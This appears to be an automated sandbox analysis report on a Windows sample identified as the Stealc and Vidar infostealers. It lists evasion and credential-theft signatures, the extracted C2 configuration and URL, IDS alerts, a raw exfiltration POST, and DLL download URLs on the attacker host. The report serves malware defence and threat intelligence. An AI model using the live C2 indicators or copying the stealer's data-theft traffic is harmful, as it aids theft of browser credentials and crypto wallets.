Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1520049
MD5:	904925a03f5e62b7b67ee30d22e9c7cf
SHA1:	acec73d1e47b2dddf74addc3529345254135062f
SHA256:	d5f6c82d696b68c10f33762a2fd0628afd233b0d07c99654b186f699446d990b
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6132 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 904925A03F5E62B7B67EE30D22E9C7CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2074330924.0000000005110000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 6132	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6132	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6132	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.540000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:04.698840+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:04.634601+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:04.919274+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:06.016545+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:04.926087+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:04.392583+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:14:06.496049+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:11.763214+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:12.805120+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:13.526244+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:14.366920+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:16.093665+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:16.509752+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 46 41 45 46 32 34 42 44 33 42 33 30 32 33 30 31 31 38 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"04FAEF24BD3B3023011859------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"save------JKKFIIEBKEGIEBFIJKFI--

Source: file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/$5
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll1
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllr
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll-
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllM
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllC
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/C5
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php37
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpch
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm
Source: file.exe, 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2301973505.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2301973505.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpyl;
Source: file.exe, 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37u
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2329060749.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: CBGCAFII.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: CBGCAFII.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CBGCAFII.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://support.mozilla.org
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2319887093.0000000029A71000.00000004.00000020.00020000.00000000.sdmp, CBGCAFIIECBFIDHIJKFB.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, CBGCAFII.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: CBGCAFII.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2249845293.000000002FB00000.00000004.00000020.00020000.00000000.sdmp, HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2249845293.000000002FB00000.00000004.00000020.00020000.00000000.sdmp, HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2249845293.000000002FB00000.00000004.00000020.00020000.00000000.sdmp, HIDHDGDHJEGHIDGDHCGCBAKFHI.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

